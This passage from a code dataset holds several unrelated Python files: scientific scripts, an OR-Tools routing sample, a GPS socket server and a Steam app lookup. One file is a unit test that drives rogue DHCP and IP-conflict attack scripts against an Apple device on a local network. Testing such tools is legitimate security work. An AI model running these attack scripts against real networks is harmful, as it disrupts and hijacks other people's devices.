Verif array across the leadtime dimension \"\"\"\ndef convolve(array, window, ignore_missing):\n assert(len(array.shape) == 3)\n c = np.ones([1, window, 1])\n if ignore_missing:\n # Does this work?\n array[np.isnan(array)] = 0\n new_array = np.nan*np.zeros(array.shape)\n new_array[:, (window-1):, :] = scipy.signal.convolve(array, c, \"valid\")\n return new_array\n\n\ndef main():\n parser = argparse.ArgumentParser(prog=\"ens2prob\", description=\"Converts ensemble information to probabilistic information\")\n parser.add_argument('ifile', help=\"Verif text or NetCDF file (input)\")\n parser.add_argument('ofile', help=\"Verif NetCDF file (output)\")\n parser.add_argument('-r', type=verif.util.parse_numbers, help=\"Which thresholds to compute CDF values for?\", dest=\"thresholds\")\n parser.add_argument('-q', type=verif.util.parse_numbers, help=\"Which quantiles to compute values for?\", dest=\"quantiles\")\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(0)\n\n args = parser.parse_args()\n\n ifile = verif.input.get_input(args.ifile)\n locations = ifile.locations\n locationids = [loc.id for loc in locations]\n leadtimes = ifile.leadtimes\n times = ifile.times\n lats = [loc.lat for loc in locations]\n lons = [loc.lon for loc in locations]\n elevs = [loc.elev for loc in locations]\n\n fcst = copy.deepcopy(ifile.fcst)\n obs = copy.deepcopy(ifile.obs)\n ens = copy.deepcopy(ifile.ensemble)\n if len(args.thresholds) > 0:\n cdf = np.zeros([fcst.shape[0], fcst.shape[1], fcst.shape[2], len(args.thresholds)])\n if len(args.quantiles) > 0:\n x = np.zeros([fcst.shape[0], fcst.shape[1], fcst.shape[2], len(args.quantiles)])\n\n for i, threshold in enumerate(args.thresholds):\n cdf[:, :, :, i] = np.nanmean(ens < threshold, axis=3)\n\n M = ens.shape[3]\n \"\"\"\n To compute inverse CDFs, assign quantiles to each ensemble member. There are several approaches:\n - Set the lowest member to and the highest to 1\n - Set the lowest to 1 / (M+1) and the highest to M / (M+1)\n In either case, if a value is outside the ensemble range, set the value to the CDF assigned to\n the nearest member.\n \"\"\"\n lower_cdf = 0 # 1.0 / (M + 1)\n upper_cdf = 1 # float(M) / (M + 1)\n for i, quantile in enumerate(args.quantiles):\n f = scipy.interpolate.interp1d(np.linspace(lower_cdf, upper_cdf, M), ens, bounds_error=False, fill_value=[lower_cdf, upper_cdf], axis=3)\n x[:, :, :, i] = f(quantile)\n\n file = netCDF4.Dataset(args.ofile, 'w', format=\"NETCDF4\")\n file.createDimension(\"leadtime\", len(ifile.leadtimes))\n file.createDimension(\"time\", None)\n file.createDimension(\"location\", len(ifile.locations))\n if len(args.thresholds) > 0:\n file.createDimension(\"threshold\", len(args.thresholds))\n if len(args.quantiles) > 0:\n file.createDimension(\"quantile\", len(args.quantiles))\n vTime=file.createVariable(\"time\", \"i4\", (\"time\",))\n vOffset=file.createVariable(\"leadtime\", \"f4\", (\"leadtime\",))\n vLocation=file.createVariable(\"location\", \"f8\", (\"location\",))\n vLat=file.createVariable(\"lat\", \"f4\", (\"location\",))\n vLon=file.createVariable(\"lon\", \"f4\", (\"location\",))\n vElev=file.createVariable(\"altitude\", \"f4\", (\"location\",))\n vFcst=file.createVariable(\"fcst\", \"f4\", (\"time\", \"leadtime\", \"location\"))\n vObs=file.createVariable(\"obs\", \"f4\", (\"time\", \"leadtime\", \"location\"))\n if len(args.thresholds) > 0:\n vCdf=file.createVariable(\"cdf\", \"f4\", (\"time\", \"leadtime\", \"location\", \"threshold\"))\n vThreshold=file.createVariable(\"threshold\", \"f4\", (\"threshold\"))\n if len(args.quantiles) > 0:\n vX=file.createVariable(\"x\", \"f4\", (\"time\", \"leadtime\", \"location\", \"quantile\"))\n vQuantile=file.createVariable(\"quantile\", \"f4\", (\"quantile\"))\n file.Variable = ifile.variable.name\n file.units = unit = ifile.variable.units.replace(\"$\", \"\")\n file.Convensions = \"verif_1.0.0\"\n\n vObs[:] = obs\n vFcst[:] = fcst\n vTime[:] = times\n vOffset[:] = leadtimes\n vLocation[:] = locationids\n vLat[:] = lats\n vLon[:] = lons\n vElev[:] = elevs\n if len(args.thresholds) > 0:\n vThreshold[:] = args.thresholds\n vCdf[:] = cdf\n if len(args.quantiles) > 0:\n vQuantile[:] = args.quantiles\n vX[:] = x\n\n file.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/ens2prob.py","file_name":"ens2prob.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496949976","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndfErr =pd.read_csv(\"err_infiniteBeam.csv\", index_col='case')\ndfCase =pd.read_csv(\"../../caseDefinition.csv\", index_col='case')\n\nx = dfCase[\"mu_t\"].unique()\ny = dfCase[\"albedo\"].unique()\n\nX,Y = np.meshgrid(x,y)\nprint(X)\nprint(Y)\n\nma = dfErr[\"absMa1Normalized\"].values.reshape(x.size, y.size)\nme = dfErr[\"absMe1Normalized\"].values.reshape(x.size, y.size)\nprint(ma)\n\n\nfig, ax = plt.subplots()\nCS = ax.contour(X, Y, np.transpose(ma))\nax.clabel(CS, inline=1, fontsize=10)\n#plt.show()\nplt.xlabel(\"Optical depth\")\nplt.ylabel(\"Scattering albedo\")\nplt.savefig(\"ma1normalized.png\")\nplt.close()\n\nfig, ax = plt.subplots()\nCS = ax.contour(X, Y, np.transpose(me))\nax.clabel(CS, inline=1, fontsize=10)\n#plt.show()\nplt.xlabel(\"Optical depth\")\nplt.ylabel(\"Scattering albedo\")\nplt.savefig(\"me1normalized.png\")\nplt.close()\n","sub_path":"infiniteBeam/postprocessing/contour.py","file_name":"contour.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194972151","text":"def remove(m, pkgspec, cache, purge=False, force=False, dpkg_options=expand_dpkg_options(DPKG_OPTIONS), autoremove=False):\n pkg_list = []\n pkgspec = expand_pkgspec_from_fnmatches(m, pkgspec, cache)\n for package in pkgspec:\n (name, version) = package_split(package)\n (installed, installed_version, upgradable, has_files) = package_status(m, name, version, cache, state='remove')\n if (installed_version or (has_files and purge)):\n pkg_list.append((\"'%s'\" % package))\n packages = ' '.join(pkg_list)\n if (not packages):\n m.exit_json(changed=False)\n else:\n if force:\n force_yes = '--force-yes'\n else:\n force_yes = ''\n if purge:\n purge = '--purge'\n else:\n purge = ''\n if autoremove:\n autoremove = '--auto-remove'\n else:\n autoremove = ''\n if m.check_mode:\n check_arg = '--simulate'\n else:\n check_arg = ''\n cmd = ('%s -q -y %s %s %s %s %s remove %s' % (APT_GET_CMD, dpkg_options, purge, force_yes, autoremove, check_arg, packages))\n (rc, out, err) = m.run_command(cmd)\n if m._diff:\n diff = parse_diff(out)\n else:\n diff = {\n \n }\n if rc:\n m.fail_json(msg=(\"'apt-get remove %s' failed: %s\" % (packages, err)), stdout=out, stderr=err, rc=rc)\n m.exit_json(changed=True, stdout=out, stderr=err, diff=diff)","sub_path":"Data Set/bug-fixing-5/7850dfa9d932a24a3a095234910c233344b1cda1--fix.py","file_name":"7850dfa9d932a24a3a095234910c233344b1cda1--fix.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"461318345","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom util import normalize_str\nimport json\nimport uuid\nfrom os import path, makedirs\nimport hashlib\n\nclass Member:\n \"\"\"\n Class representing a single member of the parliament\n \"\"\"\n def __init__(self, first_name, last_name, party, province, language, url=None):\n \"\"\"Class representing a single member of the parliament\n\n Args:\n first_name (str): First name of the member\n last_name (str): Last name of the member\n party (str): Party affiliation of the member\n province (str): Province the member ran in\n language (str): Language of the member\n url (str, optional): URL to the wikipedia page of the member. Defaults to None.\n \"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.party = party\n self.province = province\n self.language = language\n self.alternative_names = []\n self.url = url\n sha_1 = hashlib.sha1()\n sha_1.update(self.first_name.encode('utf-8') + self.last_name.encode('utf-8') + self.party.encode('utf-8') + self.province.encode('utf-8'))\n self.uuid = sha_1.hexdigest()[:10]# Should be sufficiently random\n\n def dump_json(self, base_path, base_URI=\"/\"):\n base_path = path.join(base_path, \"members\")\n base_URI = f'{base_URI}members/'\n resource_name = f'{self.uuid}.json'\n\n makedirs(base_path, exist_ok=True)\n \n with open(path.join(base_path, resource_name), 'w+') as fp:\n json.dump({'id': str(self.uuid), 'first_name': self.first_name, 'last_name': self.last_name, 'language': self.language, 'province': self.province, 'part': self.party, 'wiki': self.url}, fp, ensure_ascii=False)\n\n return f'{base_URI}{resource_name}'\n def __repr__(self):\n return \"Member(\\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\")\" % (self.first_name, self.last_name, self.party, self.province, self.language, self.url)\n def __str__(self):\n return \"%s, %s\" % (self.first_name, self.last_name)\n def hasName(self, query):\n \"\"\"Compare the query string with the \"{last_name} {first_name}\" combination of\n this member, ignoring any diactritical characters. Alternative names are also possible for\n the member, this is sometimes necessary.\n\n Args:\n query (str): Name as seen in the meeting notes of the parliament.\n\n Returns:\n bool: Is this the name of this member\n \"\"\"\n name = \"%s %s\" % (self.last_name, self.first_name)\n # Fallback for alternative names\n if self.alternative_names:\n for n in self.alternative_names:\n if normalize_str(query) == normalize_str(n):\n return True\n return normalize_str(query) == normalize_str(name)\n def set_alternative_names(self, names):\n \"\"\"Set alternative names by which the member should also\n be recognized in the meeting notes.\n\n Args:\n names (list(str)): All the alternative names of the member\n \"\"\"\n self.alternative_names = names\n def get_image(self):\n \"\"\"If the Member has a Wikipedia page, this method will attempt to scrape\n their image from this website.\n\n Returns:\n str: URI to the image or None if no image was found.\n \"\"\"\n if not self.url:\n return None\n page = requests.get(self.url)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n result = None\n infobox = soup.find(\"table\", {\"class\": \"infobox\"})\n if infobox:\n result = \"https:%s\" % infobox.find('img')['src'] if infobox.find('img') else None\n return result\n","sub_path":"member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"207313492","text":"class Song(object):\n\n def __init__(self, xulei):\n self.xulei = xulei\n\n def sing_me_a_song(self):\n for line in self.xulei:\n print(line)\n\nhappy_bday = Song([ \"Happy birthday to you\",\n \"I don't want to get sued\",\n \"So I'll stop right there\"])\n\nbulls_on_parade = Song([\"They rally around the family\",\n \"With pockets full of shells\"])\n\nhappy_bday.sing_me_a_song()\n\nbulls_on_parade.sing_me_a_song()\n\nclass Person:\n def __init__(self, luck, name, website):\n self.self = self\n self.luck = luck\n self.name = name\n self.website = website\n#\n# def monkey(self):\n# for myself in self.luck:\n# print(myself)\n\nxulei = Person(\"Happy birthday\",\"I love you\",\"I hate you\")\n#print(xulei.self)\nprint(xulei.luck)\nprint(xulei.name)\nprint(xulei.website)\n#xulei.monkey()\n#info.luck\n#info.name\n#info.website","sub_path":"EX40.py","file_name":"EX40.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357070918","text":"#Using output from Variant.py \n#wc -l *H* > genotypes\n\nimport pandas as pd\n\n#Read in genotypes\ngt=pd.read_csv(\"genotypes\",sep='\\s+',header=None)\n\nvars=[\"rs1990760\",\"rs60910145\",\"rs73885319\"]\nfor v in vars:\n #Loop through pops\n pop=[\"AFR\",\"AMR\",\"EUR\",\"EAS\",\"SAS\"]\n table=[]\n for p in pop:\n #Variant of interest\n variant=gt[gt[1].str.contains(v)]\n #pop\n variant=variant[variant[1].str.contains(p)]\n #Get total(n) and calc genotype freq\n Total=variant[0].sum()\n variant[p] = variant[0] /Total \n variant=variant.reset_index() \n #(HomAlt*2 + Het)/Total*2. This will be the alt allele freq.\n alt_alFreq=(variant[1:2][0][1]*2 + variant[0:1][0][0])/(Total*2)\n ref_alFreq=1-alt_alFreq\n ##Build table \n #Genotype freq\n variant=variant.transpose()[p:p]\n variant.columns = [\"Heterozygous\",\"HomozygousAlt\",\"HomozygousRef\"]\n #Other columns\n variant[\"n\"]=Total\n variant[\"Alt\"]=alt_alFreq\n variant[\"Ref\"]=ref_alFreq \n table.append(variant)\n table=pd.concat(table)\n table['Super Population']=table.index\n table=table[[\"Super Population\",\"n\",\"Heterozygous\",\"HomozygousAlt\",\"HomozygousRef\",\"Alt\",\"Ref\"]]\n table.to_csv(v+\"_table.txt\",sep='\\t',index=False,mode='w')\n","sub_path":"Tools/VariantTable.py","file_name":"VariantTable.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"186539961","text":"# region Description\n\"\"\"\ntest_apple_rogue_dhcp.py: Unit tests for Raw-packet script: apple_dhcp_server.py\nAuthor: Vladimir Ivanov\nLicense: MIT\nCopyright 2020, Raw-packet Project\n\"\"\"\n# endregion\n\n# region Import\nfrom sys import path\nfrom os.path import dirname, abspath\nfrom os import system, kill\nfrom signal import SIGTERM\nfrom time import sleep, time\nfrom subprocess import run, Popen, PIPE, STDOUT\nfrom unittest.mock import patch\nfrom typing import List, Union\nimport unittest\nimport paramiko\n# endregion\n\n# region Authorship information\n__author__ = 'Vladimir Ivanov'\n__copyright__ = 'Copyright 2020, Raw-packet Project'\n__credits__ = ['']\n__license__ = 'MIT'\n__version__ = '0.2.1'\n__maintainer__ = 'Vladimir Ivanov'\n__email__ = 'ivanov.vladimir.mail@gmail.com'\n__status__ = 'Development'\n# endregion\n\n\n# region Main class - ScriptAppleRogueDhcpTest\nclass ScriptAppleRogueDhcpTest(unittest.TestCase):\n\n # region Properties\n root_path = dirname(dirname(dirname(dirname(dirname(dirname(abspath(__file__)))))))\n path.append(root_path)\n from raw_packet.Tests.Unit_tests.variables import Variables\n from raw_packet.Utils.base import Base\n base: Base = Base()\n # endregion\n\n def kill_test_process(self) -> None:\n while self.base.get_process_pid('/apple_dhcp_server.py') != -1:\n kill(self.base.get_process_pid('/apple_dhcp_server.py'), SIGTERM)\n sleep(0.1)\n\n @staticmethod\n def restart_dhcp_server_over_ssh() -> None:\n run(['ssh ' + ScriptAppleRogueDhcpTest.Variables.router_root_username + '@' +\n ScriptAppleRogueDhcpTest.Variables.router_ipv4_address + ' \"/etc/init.d/dnsmasq restart\"'], shell=True)\n\n def check_apple_device_connected(self) -> None:\n self.kill_test_process()\n sleep(5)\n response: int = system(\"ping -c 1 \" + ScriptAppleRogueDhcpTest.Variables.apple_device_ipv4_address)\n if response == 0:\n return None\n else:\n self.restart_dhcp_server_over_ssh()\n while response != 0:\n response = system(\"ping -c 1 \" + ScriptAppleRogueDhcpTest.Variables.apple_device_ipv4_address)\n\n def test01_start_without_params(self):\n mitm_process = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py'],\n stdout=PIPE, stderr=STDOUT, shell=True)\n mitm_process_stdout: str = mitm_process.stdout.decode('utf-8')\n print(mitm_process_stdout)\n self.assertIn('the following arguments are required', mitm_process_stdout)\n self.assertIn('--target_mac', mitm_process_stdout)\n self.assertIn('--target_new_ip', mitm_process_stdout)\n\n def test02_start_without_target_new_ip(self):\n mitm_process = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py --target_mac ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_mac_address],\n stdout=PIPE, stderr=STDOUT, shell=True)\n mitm_process_stdout: str = mitm_process.stdout.decode('utf-8')\n print(mitm_process_stdout)\n self.assertIn('the following arguments are required', mitm_process_stdout)\n self.assertIn('--target_new_ip', mitm_process_stdout)\n\n def test03_start_without_target_mac(self):\n mitm_process = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py --target_new_ip ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_new_ipv4_address],\n stdout=PIPE, stderr=STDOUT, shell=True)\n mitm_process_stdout: str = mitm_process.stdout.decode('utf-8')\n print(mitm_process_stdout)\n self.assertIn('the following arguments are required', mitm_process_stdout)\n self.assertIn('--target_mac', mitm_process_stdout)\n\n def test04_main_bad_interface(self):\n mitm_process = run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py --interface ' +\n ScriptAppleRogueDhcpTest.Variables.bad_network_interface + ' --target_mac ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_mac_address + ' --target_new_ip ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_new_ipv4_address],\n stdout=PIPE, stderr=STDOUT, shell=True)\n mitm_process_stdout: str = mitm_process.stdout.decode('utf-8')\n print(mitm_process_stdout)\n self.assertIn(ScriptAppleRogueDhcpTest.Variables.bad_network_interface, mitm_process_stdout)\n\n def test05_main(self):\n self.check_apple_device_connected()\n run(['python3 ' + self.root_path + '/Scripts/Others/network_conflict_creator.py --interface ' +\n ScriptAppleRogueDhcpTest.Variables.test_network_interface + ' --target_mac ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_mac_address + ' --target_ip ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_ipv4_address + ' --quiet'], shell=True)\n run(['python3 ' + self.root_path + '/Scripts/Apple/apple_dhcp_server.py --interface ' +\n ScriptAppleRogueDhcpTest.Variables.test_network_interface + ' --target_mac ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_mac_address + ' --target_new_ip ' +\n ScriptAppleRogueDhcpTest.Variables.apple_device_new_ipv4_address + ' --quiet'], shell=True)\n sleep(5)\n response: int = system(\"ping -c 1 \" + ScriptAppleRogueDhcpTest.Variables.apple_device_new_ipv4_address)\n self.assertEqual(response, 0)\n self.check_apple_device_connected()\n\n# endregion\n","sub_path":"raw_packet/Tests/Unit_tests/Scripts/Apple/test_apple_rogue_dhcp.py","file_name":"test_apple_rogue_dhcp.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281597188","text":"#compare distribution of peak-gene distances in same cluster vs. peak-gene distances to other clusters.\nfrom pybedtools import BedTool\nthreshold=1000000\ndef get_background(to_exclude):\n peak_background=\"\"\n gene_background=\"\" \n for i in range(1,7):\n if (i!=to_exclude):\n cur_peaks=open(str(i)+\".peaks.bed\").read()\n cur_genes=open(str(i)+\".genes.bed\").read()\n peak_background=peak_background+'\\n'+cur_peaks\n gene_background=gene_background+'\\n'+cur_genes\n peak_background=BedTool(peak_background,from_string=True)\n gene_background=BedTool(gene_background,from_string=True)\n peak_background=peak_background.sort()\n gene_background=gene_background.sort()\n return peak_background,gene_background \nimport pdb \nfor cluster in range(1,7):\n #get the peaks & genes for the current cluster \n peak_bed=BedTool(str(cluster)+\".peaks.bed\")\n gene_bed=BedTool(str(cluster)+\".genes.bed\")\n #get the background\n peak_background,gene_background=get_background(cluster)\n #peak to gene closest, cur cluster\n peak_to_gene_foreground=[int(str(i).strip().split('\\t')[-1]) for i in peak_bed.closest(gene_bed,wao=True,d=True,t=\"first\")]\n #gene to peak closest, cur cluster\n gene_to_peak_foreground=[int(str(i).strip().split('\\t')[-1]) for i in gene_bed.closest(peak_bed,wao=True,d=True,t=\"first\")]\n #peak to gene closest, background\n peak_to_gene_background=[int(str(i).strip().split('\\t')[-1]) for i in peak_bed.closest(gene_background,wao=True,d=True,t=\"first\")]\n #gene to peak closest, background\n gene_to_peak_background=[int(str(i).strip().split('\\t')[-1]) for i in gene_bed.closest(peak_background,wao=True,d=True,t=\"first\")]\n print(\"got closest values for cluster \"+str(cluster))\n #append the peak and gene distances to consider them in a single distribution\n foreground=peak_to_gene_foreground+gene_to_peak_foreground\n background=peak_to_gene_background+gene_to_peak_background\n foreground=[foreground[i] for i in range(len(foreground)) if foreground[i] \"\n )\n index = solution.Value(routing.NextVar(index))\n time_var = time_dimension.CumulVar(index)\n plan_output += (\n f\"{manager.IndexToNode(index)}\"\n f\" Time({solution.Min(time_var)},{solution.Max(time_var)})\\n\"\n )\n plan_output += f\"Time of the route: {solution.Min(time_var)}min\\n\"\n print(plan_output)\n total_time += solution.Min(time_var)\n print(f\"Total time of all routes: {total_time}min\")\n # [END solution_printer]\n\n\ndef main():\n \"\"\"Solve the VRP with time windows.\"\"\"\n # Instantiate the data problem.\n # [START data]\n data = create_data_model()\n # [END data]\n\n # Create the routing index manager.\n # [START index_manager]\n manager = pywrapcp.RoutingIndexManager(\n len(data[\"time_matrix\"]), data[\"num_vehicles\"], data[\"depot\"]\n )\n # [END index_manager]\n\n # Create Routing Model.\n # [START routing_model]\n routing = pywrapcp.RoutingModel(manager)\n # [END routing_model]\n\n # Create and register a transit callback.\n # [START transit_callback]\n def time_callback(from_index, to_index):\n \"\"\"Returns the travel time between the two nodes.\"\"\"\n # Convert from routing variable Index to time matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return data[\"time_matrix\"][from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(time_callback)\n # [END transit_callback]\n\n # Define cost of each arc.\n # [START arc_cost]\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n # [END arc_cost]\n\n # Add Time Windows constraint.\n # [START time_windows_constraint]\n time = \"Time\"\n routing.AddDimension(\n transit_callback_index,\n 60, # allow waiting time\n 60, # maximum time per vehicle\n False, # Don't force start cumul to zero.\n time,\n )\n time_dimension = routing.GetDimensionOrDie(time)\n # Add time window constraints for each location except depot.\n for location_idx, time_window in enumerate(data[\"time_windows\"]):\n if location_idx == 0:\n continue\n index = manager.NodeToIndex(location_idx)\n time_dimension.CumulVar(index).SetRange(time_window[0], time_window[1])\n # Add time window constraints for each vehicle start node.\n for vehicle_id in range(data[\"num_vehicles\"]):\n index = routing.Start(vehicle_id)\n time_dimension.CumulVar(index).SetRange(\n data[\"time_windows\"][0][0], data[\"time_windows\"][0][1]\n )\n # [END time_windows_constraint]\n\n # Add resource constraints at the depot.\n # [START depot_load_time]\n solver = routing.solver()\n intervals = []\n for i in range(data[\"num_vehicles\"]):\n # Add time windows at start of routes\n intervals.append(\n solver.FixedDurationIntervalVar(\n time_dimension.CumulVar(routing.Start(i)),\n data[\"vehicle_load_time\"],\n \"depot_interval\",\n )\n )\n # Add time windows at end of routes.\n intervals.append(\n solver.FixedDurationIntervalVar(\n time_dimension.CumulVar(routing.End(i)),\n data[\"vehicle_unload_time\"],\n \"depot_interval\",\n )\n )\n # [END depot_load_time]\n\n # [START depot_capacity]\n depot_usage = [1 for i in range(len(intervals))]\n solver.Add(\n solver.Cumulative(intervals, depot_usage, data[\"depot_capacity\"], \"depot\")\n )\n # [END depot_capacity]\n\n # Instantiate route start and end times to produce feasible times.\n # [START depot_start_end_times]\n for i in range(data[\"num_vehicles\"]):\n routing.AddVariableMinimizedByFinalizer(\n time_dimension.CumulVar(routing.Start(i))\n )\n routing.AddVariableMinimizedByFinalizer(time_dimension.CumulVar(routing.End(i)))\n # [END depot_start_end_times]\n\n # Setting first solution heuristic.\n # [START parameters]\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = (\n routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC\n )\n # [END parameters]\n\n # Solve the problem.\n # [START solve]\n solution = routing.SolveWithParameters(search_parameters)\n # [END solve]\n\n # Print solution on console.\n # [START print_solution]\n if solution:\n print_solution(data, manager, routing, solution)\n # [END print_solution]\n else:\n print(\"No solution found !\")\n\n\nif __name__ == \"__main__\":\n main()\n# [END program]\n","sub_path":"ortools/constraint_solver/samples/vrp_resources.py","file_name":"vrp_resources.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"429803133","text":"# -*- coding:utf-8 -*-\n\nimport socket\nimport sys\nimport time\nimport threading\nimport sqlite3\nfrom PyQt5.QtCore import pyqtSignal,QObject\n\nclass Server(QObject):\n\n # 监听端口\n listen_addr = ('0.0.0.0',10003)\n user_id_len = 20\n recv_complete = pyqtSignal()\n\n def __init__(self):\n super(Server, self).__init__() \n\n def _recv_handle(self,sock,client_addr):\n print('New connection from %s:%s' % client_addr)\n\n\n conn = sqlite3.connect('test.db')\n cursor = conn.cursor()\n\n recv_buf = ''\n recv_time = time.strftime('%c',time.localtime())\n\n # 接收用户名\n try:\n user_id = sock.recv(17).decode('utf-8')\n # add new user if not exists\n cursor.execute('CREATE TABLE IF NOT EXISTS \"%s\" (Time CHAR(20),GPSRecord TEXT)'%(user_id,))\n cursor.execute('INSERT INTO \"%s\" (Time,GPSRecord) VALUES(\"%s\",\" \")' % (user_id,recv_time))\n except socket.timeout:\n print('Time out')\n # 接收GPS数据\n while True:\n try:\n recv_buf = sock.recv(1024)\n # update user GPSRecord who named 'user_id'\n cursor.execute('UPDATE \"%s\" SET GPSRecord=GPSRecord||\"%s\" WHERE Time=\"%s\"' % (user_id,recv_buf.decode('utf-8'),recv_time))\n time.sleep(1)\n if not recv_buf :\n break\n except socket.timeout:\n print('Time out')\n break\n\n sock.close()\n cursor.close()\n conn.commit()\n conn.close()\n print('Connection from %s:%s ended' % client_addr)\n self.recv_complete.emit()\n\n\n def start_recv(self):\n self.listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.listen_socket.bind(Server.listen_addr)\n socket.setdefaulttimeout(5)\n self.listen_socket.listen(5)\n\n print('Waitting for connection...')\n while True:\n sock, client_addr = self.listen_socket.accept()\n t = threading.Thread(target=self._recv_handle,\n args=(sock, client_addr))\n t.setDaemon(True)\n t.start()\n\nif __name__ == '__main__':\n myserver = Server()\n myserver.start_recv()\n\n sys.exit()","sub_path":"example/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"243689033","text":"# LOOK Reformat (Alt+F). Show Intention Action (Alt+Enter). Completion (Ctrl+Space, Ctrl+Shift+Space)\n\n\n\n\nimport json\nimport csv\nimport os\nimport time\nimport logging\n\nimport urllib\nimport urllib.parse\nimport urllib.request\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nfrom sys import stdout as syso\nfrom socket import timeout\n\n\nclass Game:\n \"\"\"Describe a single steam app. More often than not, a game. Could also represent software, DLC, and anything bought from steam.\"\"\"\n\n def __init__(self, name):\n self.id = None\n self.users_name = name\n self.simplified_name = simplified_name(name)\n self.card_status_known = False\n self.has_cards = False\n\n def __str__(self):\n return self.users_name\n\n def __repr__(self):\n return \"\" % self.users_name\n\n def find_id(self, applist=None, config=None, online=True):\n accessed_net = False\n\n if self.id is not None:\n logging.info(\"ID for %s is already known.\", self.users_name)\n return accessed_net\n\n if applist is not None:\n \"\"\"Lookup your own id in the supplied list. If there are multiple games with this name it is better to leave the decision to google, if possible.\"\"\"\n if not online or not applist.contains_duplicates(self.simplified_name):\n logging.info('Looking in applist for %s' % self.users_name)\n self.id = applist.name_lookup.get(self.simplified_name, None) # default value = None\n\n if self.id is None and online:\n \"\"\"ID wasn't found in the applist. Looking for it in google.\"\"\"\n logging.info('\"%s\" was not found in the applist. Looking in google.' % self.users_name)\n # return Game.__scrap_id_from_google__(name)\n if config[\"key\"] is not None:\n self.id = Game.__search_id_google_api__(self.users_name, config[\"cx\"], config[\"key\"])\n accessed_net = True\n else:\n logging.info(\"Can't search google for %s because API key is not set. Skipping.\", self.users_name)\n\n if self.id is not None:\n logging.info(\"ID for %s is found. %s\", self.users_name, self.id)\n return accessed_net\n\n @staticmethod\n def __scrap_id_from_google__(name):\n \"\"\" Unused. Preform a google search with the name given by the user in order to locate the correct game.\"\"\"\n url = \"http://www.google.com/search?q=site:store.steampowered.com+%s&lr=lang_en\" % urllib.parse.quote(name, safe=\"\")\n hdr = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'}\n req = urllib.request.Request(url, headers=hdr)\n\n try:\n time.sleep(5)\n with urllib.request.urlopen(req) as f:\n html = f.read()\n\n # html = urllib.request.urlopen(req).read()\n except urllib.error.HTTPError:\n logging.exception(\"Failed while googling the name %s\", name)\n return None\n\n try:\n soup = BeautifulSoup(html, 'html.parser')\n anchors = soup.find(id=\"search\").findAll('a')\n final_links = [x['href'] for x in anchors if x['href'].startswith(\"http://store.steampowered.com/app/\") or x['href'].startswith(\"https://store.steampowered.com/app/\")]\n # print(\"\\n\".join(final_links))\n top_link = final_links[0]\n app_id = top_link[top_link.index(\"/app/\") + len(\"/app/\"):]\n app_id = app_id[:app_id.index(\"/\")]\n return app_id\n\n except (json.decoder.JSONDecodeError, KeyError):\n logging.exception(\"Failed to parse google's response to %s\", name)\n return None\n\n @staticmethod\n def __search_id_google_api__(name, cx, key, timeout_time=10):\n \"\"\"Uses google's custom search api to find your id\"\"\"\n url = \"https://www.googleapis.com/customsearch/v1?q=%s&cx=%s&key=%s&fields=searchInformation(totalResults),items(title,link)\"\n url %= urllib.parse.quote(name, safe=\"\"), urllib.parse.quote(cx, safe=\"\"), urllib.parse.quote(key, safe=\"\")\n hdr = {'User-Agent': 'CardsTool'}\n req = urllib.request.Request(url, headers=hdr)\n try:\n with urllib.request.urlopen(req, timeout=timeout_time) as f:\n json_bytes = f.read()\n except timeout:\n logging.error(\"Timeout while getting appid for %s. \\n\\t\\t%s\", name, req.get_full_url())\n return None\n except urllib.error.HTTPError:\n logging.exception(\"Failed while googling the name %s\", name)\n return None\n json_text = json_bytes.decode(\"utf-8\")\n try:\n data = json.loads(json_text)\n total_results = 